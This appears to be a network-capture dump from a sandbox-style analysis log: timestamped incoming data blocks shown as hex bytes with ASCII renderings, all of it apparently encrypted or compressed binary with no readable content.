                                                                                                                                                        2021-12-28 02:24:06 UTC2579INData Raw: 18 15 5c 8a 23 4c f3 c5 90 ef c9 0f e8 44 64 8d 2b 8a 63 41 2c 75 a0 6e ec aa 2a 83 88 60 fe 4e 0e ff db d2 5c 50 2b 79 1b b7 f3 8a fa 1c c8 b5 d4 4a a5 38 51 62 8a 98 0c 4d 06 9b 83 0f b7 96 e8 3d fd 5b e4 c7 a2 64 50 39 7b 46 de ca 99 3e fe 1e 8f 9c 16 d0 fb 80 da e3 83 6c b6 cb b7 08 cb 14 0e f3 e8 d6 ca a9 2b 6f 68 1b 72 16 96 4a 6d b5 e3 60 4a 5a 76 85 08 99 41 18 12 89 c5 c6 48 60 b7 be c5 6d 59 70 56 a1 05 93 eb 70 28 dc f8 30 54 7d f0 c1 46 0e 6c 9c aa 65 59 14 ac 4b 6c 96 e5 5a de f0 d4 8e fe 58 1c 0a 46 da 68 1a a9 79 e0 b1 22 95 41 18 2e 0b a6 76 eb d9 78 b8 f2 79 46 be 25 06 a1 37 bf b8 fd a7 ab b5 56 4f d5 6f 83 0f 37 e7 d2 b0 b4 ce 74 e0 12 d3 58 88 0c e0 29 a4 ee 5b ab 9e af 99 91 c8 97 dd 3f 41 67 a3 28 cc aa c0 80 43 1b 87 85 d3 44 2e 7e
                                                                                                                                                        Data Ascii: \#LDd+cA,un*`N\P+yJ8QbM=[dP9{F>l+ohrJm`JZvAH`mYpVp(0T}FleYKlZXFhy"A.vxyF%7VOo7tX)[?Ag(CD.~
                                                                                                                                                        2021-12-28 02:24:06 UTC2583INData Raw: bf 6b 91 68 bc 5a f9 ee e9 4d 82 cd b8 66 fa e5 23 04 cc 95 4f e3 f2 05 36 ba ec 2b bb 03 88 e7 e0 5c c7 67 b7 9c 6f 45 0c f2 6e 4f 9a fe c9 58 b6 42 39 af d8 95 b4 7b b3 2a 92 a4 ee ce 5a 5c f8 90 74 ac 33 23 58 d6 a0 cb a4 64 52 c7 d2 3e 10 a4 fe b2 0c c4 e5 5d 66 9a 42 09 89 0d 5f 4d 3f 11 d0 ed e6 17 3a 03 04 29 de 0f e4 d8 fc 6f 86 9a a9 19 32 99 ef 3e d1 b3 5b 36 92 c7 98 fc 01 b8 2e 11 c2 20 1e b2 57 41 d2 20 39 8b 87 fc 19 7e d1 8e 3c ae fa 94 7a 91 f4 61 2e 41 f9 0f 10 c4 06 f4 f2 10 e9 6e a4 ff cc c1 55 d8 bb b8 a8 06 f8 8c 57 49 54 ac 72 1b 18 fa 78 60 f0 03 4a 99 78 7c 8b ec 6d 07 24 64 41 27 bd 3f a7 e4 db 2f 3b 80 72 f5 53 46 ac 3f 47 d0 5b 01 96 da 51 11 57 b1 58 58 d2 6c e9 92 c1 4a 05 08 dc 7f f9 2d e4 02 80 ce d8 f2 a1 e4 ba 06 af 54 02
                                                                                                                                                        Data Ascii: khZMf#O6+\goEnOXB9{*Z\t3#XdR>]fB_M?:)o2>[6. WA 9~<za.AnUWITrx`Jx|m$dA'?/;rSF?G[QWXXlJ-T
                                                                                                                                                        2021-12-28 02:24:06 UTC2587INData Raw: cf 56 8e 54 ee cc 1a c3 a1 2b 00 1c 1f 01 6b fb c5 d9 c7 ef 32 2c 8a 7a b9 de a7 d1 ef 4e cf 2f f2 bc d3 fa a2 39 e4 96 3e ee 11 b9 09 2c 2d 8e 90 ed 0c 3b be e8 e0 66 cb c1 87 bb 1c 20 4d c9 ec 1c 69 06 7a da ae 23 9a 8a d9 b2 8d 62 24 56 f4 68 94 46 b5 03 b7 c1 40 9a 59 86 21 3d d8 ad b8 7f 8a a8 40 32 09 52 31 0f af aa c7 56 bf c3 a9 82 69 a4 6c ef c4 c9 d5 3f ad 7f 5b ba a7 a0 56 0d 14 8c 4f 99 56 84 7b 5a b5 f3 a5 cb 86 75 c9 d5 f3 7d bd 78 02 04 b9 3d a6 8b b5 a4 0d a5 4b 10 88 22 f9 89 06 93 22 e9 cf 64 cf 98 de 6b 13 42 90 2c a6 47 c7 8b de ac 30 f4 df ca de f2 82 ac c3 2d 19 6a 1d 86 02 a8 3f 27 b3 3d 87 bd 2c 7e 2b 67 1c a8 5c 28 db 77 a6 0e 80 63 87 e4 c9 05 16 ab 97 2f 71 5a 9f 25 53 99 f0 34 9d b0 bd 72 39 09 45 16 1f 79 ab 80 91 92 2d 19 33
                                                                                                                                                        Data Ascii: VT+k2,zN/9>,-;f Miz#b$VhF@Y!=@2R1Vil?[VOV{Zu}x=K""dkB,G0-j?'=,~+g\(wc/qZ%S4r9Ey-3
                                                                                                                                                        2021-12-28 02:24:06 UTC2591INData Raw: 6d 2d 9a f1 76 3a 21 ce 74 64 2e 60 89 61 d5 4b f7 15 4d a4 5c 44 5f 9e 1e f7 97 93 e3 61 30 82 5e db a8 bd 2e 11 e5 49 72 4d 23 36 f5 8f 50 28 3d 79 24 1c 0b ae 91 2f 6c 31 18 43 a0 16 ce 4f 73 dc 96 a2 92 ce 57 95 d9 ee 52 03 07 a3 ec f5 e4 78 fd e0 fb df d0 da 4c c7 a9 0b f6 73 87 9f 90 d4 63 8c 27 be c9 d3 07 4e 2d 88 f5 92 ab 88 e8 c6 23 18 52 92 04 78 4f 88 ea c3 9e 94 45 ce 72 6e ed de 1f 8c 15 0f 95 ec 1e 16 ff 39 96 46 2d a4 47 80 1c 34 73 3a 44 8c 12 cc 7e 8b 8f 05 de 3c 42 f0 53 ff 44 f8 33 61 e5 66 c7 4f 99 16 a9 85 e8 f5 11 ee 86 db 44 dd 99 16 bb b7 db 56 31 36 13 02 ae 05 df e7 2a c9 ea 71 26 50 b3 7c ab 98 d2 a7 76 46 dc df 86 cb 7c 08 2b d9 6e d2 ff 1f d2 dc 6c 1c 05 bb 58 92 a2 f3 eb 33 40 86 0f 39 bc 57 0e 4e af d9 fa 17 7a 56 33 dd 65
                                                                                                                                                        Data Ascii: m-v:!td.`aKM\D_a0^.IrM#6P(=y$/l1COsWRxLsc'N-#RxOErn9F-G4s:D~<BSD3afODV16*q&P|vF|+nlX3@9WNzV3e
                                                                                                                                                        2021-12-28 02:24:06 UTC2593INData Raw: 3a 47 cd 0c 14 96 d0 3a 8a 02 81 27 fd 98 a1 e5 34 36 d1 6a e2 a3 b4 3f ae a7 49 0e 0a 48 54 e7 30 57 e1 d2 f1 55 dd 82 cc 08 c6 df 1d 27 bc 9b 11 9c f8 1f ee 27 35 3e 43 09 ec 31 56 90 eb de f6 9f c5 d2 6e d6 b8 28 21 22 94 c2 4c 53 d8 67 8e e1 67 1b b6 8e 9d 7f 6e e3 60 96 56 60 f9 a3 e6 ea 30 96 67 2a fb 84 c4 fa 34 5b 4f 89 2e ff 1d 3f 77 0d aa 90 e1 6c 3f b9 0d 52 43 82 86 bc 30 fb c4 9b d9 3c 12 6a 3a 59 c6 0a a9 4e d4 6b 1e 14 2c 35 03 9a 61 c0 c9 60 4a 13 3f 3e 92 29 44 5c fd 68 9f c1 65 be 49 05 2a be 4b 8a 08 8a d3 d4 f9 66 52 20 36 db d7 e7 7c 50 5b 41 e3 db df 51 e8 a1 c5 7f d1 4e 6c 53 4f 20 fc 4c b6 08 c4 bb e2 c2 bd eb 47 a9 f5 80 cd ca 11 fd d4 c2 cc 2a ae 71 36 17 00 42 ce bc 8d 88 0a b5 fc 89 4f 66 8c fe f9 b6 76 4a 4a c8 b9 51 16 dd be
                                                                                                                                                        Data Ascii: :G:'46j?IHT0WU''5>C1Vn(!"LSggn`V`0g*4[O.?wl?RC0<j:YNk,5a`J?>)D\heI*KfR 6|P[AQNlSO LG*q6BOfvJJQ
                                                                                                                                                        2021-12-28 02:24:06 UTC2609INData Raw: 1c 24 c1 5e a2 4c ed 92 d1 18 ce 18 23 13 de 28 19 58 39 76 6b e6 8d d9 f5 cd 9e 51 8f 89 d1 ea 8e 60 a5 d7 3b e6 e7 d5 15 92 f8 49 ba c1 a8 65 71 da e2 e8 7e c7 77 e6 6f a7 b6 d9 74 20 06 61 18 5e 10 8c b7 9f 7c 2d 0d 94 d7 16 59 cd 98 aa 67 3a 73 f5 78 f3 a3 e2 11 d5 a3 14 0c 92 bb 5c ee 37 ea 0c 81 75 81 22 5e 8a 06 6d 41 5c 2d 7f 4e bf b9 b5 cf 95 cd 96 31 99 cd 74 2f 6f 0c a9 5b 0f d0 5b b0 58 0c 18 d8 25 e1 ba e2 56 44 13 79 15 9f f4 cf a4 7e cd 9d 6f 32 6a 45 6d 54 51 ce ac e8 e6 1e 83 c7 b2 7e cc 07 c0 05 b5 76 30 0e 05 10 74 41 68 33 d7 f5 30 f9 48 72 52 10 44 95 21 ca 37 84 07 a7 08 5f 04 e2 b3 48 f2 ac 2a 5c a5 58 25 2e 71 e7 06 38 dc 7f 30 28 31 18 77 53 63 60 9a 6f af 41 42 32 8b 33 97 db 25 11 ef 99 c8 f5 d8 ec 5d 5a 0d 0c a6 c1 bd cb 38 43
                                                                                                                                                        Data Ascii: $^L#(X9vkQ`;Ieq~wot a^|-Yg:sx\7u"^mA\-N1t/o[[X%VDy~o2jEmTQ~v0tAh30HrRD!7_H*\X%.q80(1wSc`oAB23%]Z8C
                                                                                                                                                        2021-12-28 02:24:06 UTC2625INData Raw: 47 56 7e 61 39 8d 64 af fe f9 78 4a a1 aa cf 64 f9 fc 4d d5 3e 9e a3 74 08 7d 0b 87 ba 74 04 77 af 94 f9 37 f1 e6 fb c0 eb af 25 ca 61 2b 91 92 0f 44 db 68 f7 f4 e1 b1 45 da b3 b4 5e 9e 35 c3 46 ac 3e 31 d2 99 0e c8 f7 ef fe 70 66 ee 24 33 ee 92 f6 cc 7d 19 6f a1 e8 b5 c6 da 99 54 2e de cc 24 ba fa a7 e9 93 56 6b 49 4a 8e d8 a8 a1 59 ce 1d ab b7 b7 4e ae 40 aa 6e 80 c0 82 1b 09 48 86 9f 39 9b 51 b5 62 3c f0 e4 ef 51 51 d5 51 2b 37 0a 2e 41 06 5b 51 82 19 40 e9 13 ce a1 a0 a8 99 b6 84 a6 a0 99 11 a0 d6 84 32 70 28 de 46 75 ec 0f e5 df aa 60 96 ed 62 45 07 27 63 1c e9 71 aa 8b b3 05 ed 2f c5 ab d7 27 53 12 ab e9 90 5e 3f c8 e2 6e dc bc db 40 77 79 69 92 bd dd 29 ae 98 c2 da 37 d6 ac f1 21 56 9a b4 3a a4 9b 4f 40 65 2d 08 60 30 22 6c 5a da 06 41 bb 72 81 1d
                                                                                                                                                        Data Ascii: GV~a9dxJdM>t}tw7%a+DhE^5F>1pf$3}oT.$VkIJYN@nH9Qb<QQQ+7.A[Q@2p(Fu`bE'cq/'S^?n@wyi)7!V:O@e-`0"lZAr
                                                                                                                                                        2021-12-28 02:24:06 UTC2641INData Raw: 46 b0 3c 92 4b 43 1f 2e 7c 04 48 9b d8 eb 96 ff c8 87 25 03 31 ba 91 7a cf dd 57 74 41 0b 21 99 77 43 c6 3a e8 37 fa 1c f8 43 f5 19 ed 0a 41 9d ac d1 35 b2 c9 df 6d 6a 58 cc 74 80 88 59 12 4d 3e 29 98 37 d6 d5 08 af 52 ff cd 78 14 12 2f 5f 6c b3 4c 8e 1b 02 27 6b ed ed cd a9 91 eb 19 92 0f 7a 60 06 70 ee fd 02 06 a2 b9 e1 bb 54 00 6d 34 d4 b4 e8 fe 05 68 96 9a 6e e4 91 f1 3c b1 05 6e 93 80 a7 d4 d9 49 49 86 d6 4c de 24 19 e3 5a 55 aa f8 d0 ba 53 10 c7 de 8c a5 53 d4 c5 95 76 aa 0d 57 90 23 5f 60 e4 38 5c 13 72 d6 bd c5 ad df 8f bb 91 aa ee f5 0f 8d 6d 68 0c d3 de 5d 4b 45 95 88 0c 11 30 03 f3 2c 11 af 9c 8b dc af e8 ac 6a 1f 41 30 33 a3 b5 f2 d1 91 41 b8 3e 5d 09 11 c5 2a 23 9d 09 56 d5 6b 14 28 76 e5 de 30 be ec ff 2e 94 db db f3 73 d4 d0 c3 61 2b dc ac
                                                                                                                                                        Data Ascii: F<KC.|H%1zWtA!wC:7CA5mjXtYM>)7Rx/_lL'kz`pTm4hn<nIIL$ZUSSvW#_`8\rmh]KE0,jA03A>]*#Vk(v0.sa+
                                                                                                                                                        2021-12-28 02:24:06 UTC2660INData Raw: 68 5f 1a 79 83 65 59 12 e4 72 64 8a 76 1f a3 97 9e 48 e4 97 1a b0 85 55 a1 80 3a a0 50 eb 43 5f 76 32 45 02 fc 6f 44 b4 96 b6 28 2d 53 c2 c6 61 ca 56 e9 14 e1 24 33 b4 0f f3 18 32 e9 7d 73 98 6f 94 bd b6 e0 5f f7 e7 af 34 c3 30 18 18 d0 a2 f3 e8 ca f5 66 ba d5 48 c6 4c 8a 1a 5d 63 d3 c0 db ca 65 2d 14 c8 7a 81 55 67 8a a2 97 39 0c a8 60 2a 82 a5 27 d9 a6 e2 ba 70 66 e7 5f b2 8c 50 ff d5 d0 16 0d 79 d5 66 e7 2c d1 26 f3 50 38 36 6f fd 2e 12 12 a2 d7 07 a7 53 e8 29 18 53 8a 89 70 80 af f7 89 25 1d f4 e7 9c 48 1b 64 e7 80 65 9d 06 c7 d1 c0 b0 9b e3 f2 30 c7 db 13 68 7a 14 92 64 87 64 82 ef 14 cf 01 20 24 90 7f ed a7 ae 99 f1 ed b2 86 45 42 a0 35 4d f2 32 d8 18 70 d0 f1 45 4f d0 1c 4b a0 04 3a 98 ee 0a b4 16 56 34 30 7f c5 54 99 1e 30 df d4 6e 8c e0 2c e8 ce
                                                                                                                                                        Data Ascii: h_yeYrdvHU:PC_v2EoD(-SaV$32}so_40fHL]ce-zUg9`*'pf_Pyf,&P86o.S)Sp%Hde0hzdd $EB5M2pEOK:V40T0n,
                                                                                                                                                        2021-12-28 02:24:06 UTC2676INData Raw: 60 29 23 b3 d3 95 5b ef df 82 8b aa 77 74 52 74 5f df 78 2d d0 77 1b 5a e2 c7 7e 58 fd 7e 12 14 dc ab f1 dc 81 28 39 2a 54 74 54 db 72 60 95 7e 0c 0f 7c e7 3d 0c a7 f7 a3 b8 b7 ba a0 f5 c0 81 90 9b 09 61 a3 b2 4a f2 4d 2f dd ec 2b b1 17 a7 6d 6d 86 90 98 7d 9d e6 75 ee 31 3d 99 7e 06 48 61 d4 6d c0 ce 14 0a 64 b5 e4 0c d6 6a 70 c8 b1 6e 46 e9 0b be 1c 23 11 c8 a2 14 50 87 6a ad d8 4f 61 2f 19 3d 6e 89 af 63 dc 90 d0 04 0e 13 6d 01 c2 af 92 da 5e 92 40 c6 d6 8d b6 3e 38 f3 7f 44 d7 97 77 e2 32 0b 63 3c 23 50 2d 14 d8 20 09 94 d7 d9 4b 5a d9 16 ec 67 39 f9 7a 3c 91 9f 45 25 00 18 8f 6a c0 d9 24 06 1e 4e 9a c3 7d 81 54 77 11 c4 6c 59 20 e8 20 f8 36 67 f6 53 68 28 da 7a 42 39 50 01 0a 0b 81 5f 10 f9 c4 fa bb 70 8c aa b5 d7 e5 6b 2b a7 bd d6 ba f8 29 af 75 f7
                                                                                                                                                        Data Ascii: `)#[wtRt_x-wZ~X~(9*TtTr`~|=aJM/+mm}u1=~HamdjpnF#PjOa/=ncm^@>8Dw2c<#P- KZg9z<E%j$N}TwlY 6gSh(zB9P_pk+)u
                                                                                                                                                        2021-12-28 02:24:06 UTC2692INData Raw: b5 60 48 49 25 46 74 7b 78 7d 46 14 fa e5 9d 88 75 b1 65 39 2d 68 c4 bf e8 37 4e f9 80 83 85 c6 2f 64 ea 11 47 da ef de ae 9c 7e bc 17 13 b1 20 7e 61 c0 8f 38 cf 0f 71 85 f9 b6 57 74 c5 f6 71 36 61 69 a3 07 79 69 d1 8d 63 1a a8 cf b1 b7 3e ee d7 27 27 91 0b ab 1f 5c 59 ff 41 5b 80 9c 38 f1 cb db 64 52 eb 85 fe b5 37 44 04 5e a6 cb 0a 70 9a 29 c2 3b 5f bf ca 06 b4 e9 69 1c 76 71 f0 1d c3 65 6d 9b df 5b 87 b9 14 39 2b 67 a0 b6 67 9c 13 99 09 c7 ab e9 f9 70 4a 31 d7 a4 2f a7 a4 df d0 dc a2 65 1d 27 9b 50 50 98 47 38 cd 74 82 65 3b 81 0c 1d e5 37 cd 2b 71 f6 6e 9a 72 d5 8f 3c 2b f8 09 3f 82 37 7b da 4e b7 8b 12 23 84 12 92 a5 b7 89 4f 85 00 18 eb 99 58 8d d9 df d7 ce 78 47 51 20 94 0b 22 79 1a 79 bc f4 37 7b 31 ca f7 02 c9 60 11 0d 40 c3 55 54 ae 33 99 cf c4
                                                                                                                                                        Data Ascii: `HI%Ft{x}Fue9-h7N/dG~ ~a8qWtq6aiyic>''\YA[8dR7D^p);_ivqem[9+ggpJ1/e'PPG8te;7+qnr<+?7{N#OXxGQ "yy7{1`@UT3
                                                                                                                                                        2021-12-28 02:24:06 UTC2708INData Raw: 95 70 2c 84 9f 83 98 4b aa 6f f9 b0 1b 96 b4 07 97 60 75 35 64 a8 09 96 df cc c4 10 6f f3 d0 cc e2 1c 2f 4d 41 4f b2 54 ac 3c 87 fd 92 38 e8 56 71 b1 cf d5 df 4b a1 a6 20 19 d2 0d bc 22 70 6e 5d c1 7e 1b 7c 0a 6f 51 f5 39 09 61 8b ae 39 f0 e8 ff b1 d0 57 d0 37 53 33 f6 15 ff 1c b5 f5 2e 70 3b 8a e2 5e a9 f0 27 49 b1 bc 7a 38 af 50 50 d6 9b 54 9e c7 ee 9a 25 f0 78 00 4b 1d 19 f3 6e 28 5f ab 0b df c5 47 e2 f2 13 9b a1 60 2c 00 67 a8 ee d3 b0 65 dd 8a f6 b2 4d 81 3d 49 86 d8 6b 31 e2 98 83 69 30 ca 30 ae 33 e0 4a be d1 0a 3d f7 0e 02 23 25 b3 1b c5 b5 35 32 9e 6f 90 64 83 57 de 4f d2 28 09 ea 34 37 98 da 0b 93 f7 ea bf 85 47 e5 22 fa 31 d1 6f be b5 78 66 14 90 3b 46 46 48 39 9f 7a 01 bf 14 79 71 ee 3b d7 3f b5 76 df c6 fa aa 47 74 d6 2f 8e 3f a0 18 ed 71 16
                                                                                                                                                        Data Ascii: p,Ko`u5do/MAOT<8VqK "pn]~|oQ9a9W7S3.p;^'Iz8PPT%xKn(_G`,geM=Ik1i003J=#%52odWO(47G"1oxf;FFH9zyq;?vGt/?q
                                                                                                                                                        2021-12-28 02:24:06 UTC2724INData Raw: ec 43 ea d3 de 1e 83 0c 54 8a 28 14 6f 0a 3a 8b f4 7c 98 e3 05 bd b3 cd 92 aa 21 64 16 20 44 02 5e e5 c2 cc 92 ac e3 cc 29 8b 40 bd 5e e5 86 46 9f 36 e8 75 1f d5 a6 4e 7d 88 1b 05 df 22 f5 95 2a 25 99 9e 2e c6 ee 58 cc db c5 e5 b7 9e c4 17 66 de 52 e8 75 65 62 d7 d4 aa 0f a9 2e c4 ba 74 e9 82 5a 8f 6d 6c df 53 83 d5 90 bd cc 4a cf e9 35 b1 b3 9d f5 98 3e 55 09 c8 d3 93 86 be a5 ed bc 8d dd 0b 9e 64 20 50 57 99 24 68 8a 70 71 12 cc ff aa ea e5 fa ee dd d4 fd 34 81 ab 18 86 4f ab 43 29 8b e2 13 50 b4 7f cd 00 25 40 d4 05 73 d2 4c 75 d5 40 04 b0 07 de 7d 74 6b eb 60 1a 15 2e c6 10 f9 64 34 b7 6b ef 2a b3 1d 99 d1 ba 20 2d a7 a1 3f 45 89 e2 c9 01 a9 3f 98 9c 13 d7 a0 d7 95 93 28 e8 75 5b 82 ca dc a9 d3 e6 91 2b 6e ab 70 71 63 c6 61 c4 14 02 ee 4b be b0 c8 4e
                                                                                                                                                        Data Ascii: CT(o:|!d D^)@^F6uN}"*%.XfRueb.tZmlSJ5>Ud PW$hpq4OC)P%@sLu@}tk`.d4k* -?E?(u[+npqcaKN
                                                                                                                                                        2021-12-28 02:24:06 UTC2740INData Raw: fe b0 68 93 8e 87 7d f3 0c be b0 43 7b 3f 40 2c dd 67 d3 f5 5a 6a 53 fc 4b 40 c9 8c 66 d5 33 c4 11 c4 59 8a 48 14 d7 3e 2f 5b 80 85 d0 c8 53 46 ec 06 75 e6 01 7c 12 31 e2 a8 66 13 4f 6f 11 06 c5 6c 0e 11 89 d7 21 0a 8a 19 3d f7 cb ef e2 53 a6 b8 c6 93 33 01 8a 18 c7 8d 80 8d 69 54 d7 dc 07 50 a1 be 3b 49 84 39 94 0a ec 0e 40 2a 1c 98 4b d9 18 43 76 17 1b e1 3a cc 4a 8f ea 28 ad 86 a7 fa 71 06 a9 eb 09 4b 84 76 9a ab 84 95 14 63 95 b2 47 f5 2b 80 44 30 b1 52 5b 00 ad 02 bb 36 38 5b e2 72 ad 2c 04 a3 2a df 8e a1 1b 2b a5 94 e5 f9 86 4d 66 29 a1 d2 7a 47 b4 47 9a 4e d6 85 cc 23 10 02 19 2c 3a cf df 1f cb 4a 2e d4 87 f8 fd 84 71 8d 90 a6 60 34 fe b9 a3 55 51 eb 23 88 ec 59 58 89 81 34 a3 ca 2e fb 64 5e 8c ad e8 bb 85 52 77 4a 70 08 81 2d 2c 23 4b c0 70 06 cd
                                                                                                                                                        Data Ascii: h}C{?@,gZjSK@f3YH>/[SFu|1fOol!=S3iTP;I9@*KCv:J(qKvcG+D0R[68[r,*+Mf)zGGN#,:J.q`4UQ#YX4.d^RwJp-,#Kp
                                                                                                                                                        2021-12-28 02:24:06 UTC2756INData Raw: 1d bb c5 19 47 81 c1 66 b5 06 3e 20 82 95 78 03 ce 05 24 2e be 70 50 a7 21 4b 0c 7b 48 e9 e8 98 ae ac d1 69 7a 93 5a ba 01 0a e9 0b de 33 7e bb c2 0c 8a 01 1b 06 26 07 b4 03 27 f4 89 f2 50 c8 3c 2c b1 cf ac d2 3c 14 f7 c3 ab 5e a3 31 f7 06 9c be 9f 93 93 3a 39 94 4b 0c c5 29 dc 10 02 38 2c 2a 7b 54 48 c7 7d 25 95 da b9 f5 16 83 2b 45 d1 03 04 37 7f 98 25 68 7c c0 7a a2 c1 02 24 0d f3 73 09 eb 85 8e 41 d6 0f 67 10 17 7b 10 11 9a 26 27 d1 8d 94 69 04 ae 77 c1 d4 89 e5 6d 40 50 c8 56 cd 56 6e 31 1a 45 9f 3b 26 fc e0 92 3c 95 e2 e4 55 e3 be 74 31 37 fb 76 f6 29 fa 40 b8 46 85 a5 65 33 1b 5f e4 17 b6 77 f4 f1 29 ec 7b a8 8e 20 ef 7a 2e 69 47 b6 e0 c5 36 88 a5 17 75 07 19 b5 fe 25 f0 af 76 1e 28 ca dd 9f 23 a9 59 9b 57 07 1e aa 33 b3 65 2c 6a 87 b8 7a d9 36 87
                                                                                                                                                        Data Ascii: Gf> x$.pP!K{HizZ3~&'P<,<^1:9K)8,*{TH}%+E7%h|z$sAg{&'iwm@PVVn1E;&<Ut17v)@Fe3_w){ z.iG6u%v(#YW3e,jz6
                                                                                                                                                        2021-12-28 02:24:06 UTC2772INData Raw: 5d 4b a7 6e 16 fd a2 a0 90 5f 51 c0 4c 9f 41 45 c4 4d 23 d6 69 80 17 3f 75 ff bd e8 86 37 62 35 b3 08 4d 88 c8 27 2a 0d 5d f0 d1 d1 74 f2 14 21 c4 fd 2f cb d0 02 27 6d 72 ff 75 31 f2 be 16 e7 9c 42 56 a8 a0 39 64 15 44 31 29 af b6 20 a6 c2 80 4f 84 2c 3f 2d 91 b4 9a b3 dc 83 83 90 6d 98 c2 b4 0d 92 a5 b9 2f 17 c9 ef b2 8a f2 6f b1 42 84 ab 45 2b 1f 67 5a ed 85 9a 30 2c 14 50 70 fc 64 8a 9e 98 72 79 b2 7a d6 13 f7 bc 96 7b 17 3b 9b 56 37 1c da 2d 46 48 4a 23 6f 4d 55 57 1c f1 f4 bd 2b 04 89 70 31 3d ec 1d c4 85 bc 0f dc a9 db 2b 00 6e 91 05 c4 b9 73 5c 4f f0 12 9e 10 e9 ca 6e b2 ae b8 08 22 c9 ab ad 8d 02 d8 78 df 0c 63 d7 b9 dd 6a 49 eb ad a7 b8 84 55 aa a2 8d 44 3c 42 5c 02 12 ed 73 b8 ca 0c ca c8 5e 14 ca 99 57 3f ba 8f b3 68 77 1e 87 c0 36 43 9d ec 94
                                                                                                                                                        Data Ascii: ]Kn_QLAEM#i?u7b5M'*]t!/'mru1BV9dD1) O,?-m/oBE+gZ0,Ppdryz{;V7-FHJ#oMUW+p1=+ns\On"xcjIUD<B\s^W?hw6C
                                                                                                                                                        2021-12-28 02:24:06 UTC2788INData Raw: 1b 7f 1d 9f bc af 92 2d 2a a6 27 c9 69 c6 3b 91 2e 93 29 fa b6 34 48 85 8b 32 28 e6 3c 23 8f 34 35 13 b1 53 f1 b3 35 85 a7 33 31 8d dd ab 71 be 67 9b 43 07 fd 34 a8 62 07 a5 62 dc 5b e4 5a 68 36 e8 89 d7 f4 f9 15 5a 90 ff ea 2b 2c 39 73 6a 77 bc 5e 93 59 44 20 a3 78 e2 3e af 47 49 1d 32 0e a2 27 ea 65 08 f3 51 0d c9 f3 9a 75 a9 6e 09 de 21 05 ff 1d 49 33 c9 f5 31 e0 61 20 50 63 95 15 d3 38 66 2d 2b b6 75 c6 24 a0 16 ef 96 ab 29 da 00 b3 a8 ef 44 4c 41 f3 72 5b be 79 e7 b8 b0 41 81 57 4b 85 ff c1 b0 db b0 87 5e cd 33 c8 7b c4 5a ca 12 98 14 ec 71 e8 2b c1 70 7a de c5 a0 5c 41 3a 65 46 0a df c2 6f b8 83 fa af 6b 26 2e 85 bd 3c 47 7f e0 e3 c4 f6 ad 9e f9 5c 91 2c 7a 5e 96 ff 08 75 47 24 aa 1a 50 72 dc b2 9b 4f ef f2 ed b6 73 5d c6 11 5f 09 20 11 ed 5c b1 f0
                                                                                                                                                        Data Ascii: -*'i;.)4H2(<#45S531qgC4bb[Zh6Z+,9sjw^YD x>GI2'eQun!I31a Pc8f-+u$)DLAr[yAWK^3{Zq+pz\A:eFok&.<G\,z^uG$PrOs]_ \
                                                                                                                                                        2021-12-28 02:24:06 UTC2804INData Raw: e6 76 4a 5c 6b 4d 78 cb 99 96 d7 7d 88 68 d4 d6 7b 3c 8c 11 e7 09 36 86 19 2c e1 e6 27 90 1f 75 cf db 40 1f d0 da 92 a5 17 ee f1 54 56 4c c6 cb cf dc d0 cd f1 a4 83 33 81 d5 2f 72 75 7f 77 13 86 c7 27 8a 31 8d 93 8b 0f 79 cd a1 8e 90 67 a6 3f 3e 68 b5 f6 2b 10 d8 bd 64 06 71 67 ba f5 3a f4 5b 10 85 b6 6f 4a d0 6f 3c 80 a2 70 9b d3 48 04 c7 e1 df b6 cb 6e 4a 47 b8 fd b5 2b 81 b5 d0 1a 45 0c 38 2e ea 1b e0 19 d0 84 13 c7 e8 01 25 12 e9 d8 2a 21 93 8e da 72 13 12 5e d4 6a 49 72 36 5a ee 65 35 c8 43 ef d3 6e 0f 11 b7 6c b3 cc 4d 02 3d 32 3e 7b e9 55 99 dd 07 36 c0 f6 35 a9 ea 57 f2 fd 81 e1 7d 68 e7 9b ab 78 3d 87 86 b7 35 3c 6d f2 c9 3a a6 d5 92 2c 60 16 8f cb 07 76 b8 e9 3e 34 f0 c5 c5 e2 01 12 92 1e 42 79 f2 28 57 1a ab 1d 2d 62 d4 fb e6 4f 38 e1 3d cc bd
                                                                                                                                                        Data Ascii: vJ\kMx}h{<6,'u@TVL3/ruw'1yg?>h+dqg:[oJo<pHnJG+E8.%*!r^jIr6Ze5CnlM=2>{U65W}hx=5<m:,`v>4By(W-bO8=
                                                                                                                                                        2021-12-28 02:24:06 UTC2820INData Raw: 65 7b d6 a5 d7 0f bf d3 0d 23 48 a5 97 0d d2 3b 66 3c e8 b3 0e 73 05 be e1 d6 a0 3c 95 71 8b 8b cb 6c 13 5c 3a 44 de c0 4e 40 e8 ab 8e 38 28 ab e7 6e 49 c7 17 18 26 85 a7 88 74 b8 df 76 a0 b8 1f a5 79 7a ca c1 52 a3 6a 2b 0a 82 5f c5 d5 65 d7 c9 9e 06 cf 94 ff 03 2c b2 6c f8 46 5e 2c 62 a5 a8 c8 8b b6 30 91 be 51 bd b8 a6 f0 55 d8 4e b5 c0 83 97 08 5b 2b b0 2b 1a d7 d3 c2 95 9e c2 de 62 2b bb 8f c8 5f a8 7c 3b 93 1a 95 1f 3c 03 49 80 f3 98 f5 4e 9f b4 17 db 79 e5 6e e4 83 8c 6b 01 b0 f3 0a 34 83 d6 25 2c 16 ce b7 ce de 62 18 2a 32 c0 42 f7 25 30 47 19 84 0a 27 df 82 03 08 4a ee 66 fe d8 d1 01 82 e6 77 b9 f0 89 ba 4e 74 a2 00 78 a8 ec 7b 24 7f 8b 28 17 fc 50 63 22 67 52 98 c6 e1 f2 be 11 62 a9 7b ab 44 81 73 71 8c e0 8c 65 6e e1 a2 99 b9 0a e2 ab f9 6c 37
                                                                                                                                                        Data Ascii: e{#H;f<s<ql\:DN@8(nI&tvyzRj+_e,lF^,b0QUN[++b+_|;<INynk4%,b*2B%0G'JfwNtx{$(Pc"gRb{Dsqenl7
